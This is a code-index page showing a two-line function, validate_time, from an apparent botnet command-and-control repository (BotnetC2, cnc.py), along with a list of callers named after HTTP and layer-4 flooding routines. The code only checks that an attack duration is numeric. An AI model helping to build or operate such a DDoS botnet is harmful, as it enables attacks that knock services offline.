Code
Hub
Workspaces
Following
Trending
Connect
MCP
copy
Create free account
hub
/
github.com/Hex1629/BotnetC2
/ validate_time
Function
validate_time
BOTNETc2/cnc.py:74–75 ·
view source on GitHub ↗
(time)
Source
from the content-addressed store, hash-verified
72
73
# Validate attack time
74
def
validate_time(time):
75
return
time.isdigit() and int(time) >= 1 and int(time) <= 999999999999
76
77
# Validate buffer size
78
def
validate_size(size):
Callers
5
http_flooding_sent1
Function · 0.70
all_sent1
Function · 0.70
all_layer4
Function · 0.70
http_req_all
Function · 0.70
http_req2
Function · 0.70
Calls
no outgoing calls
Tested by
no test coverage detected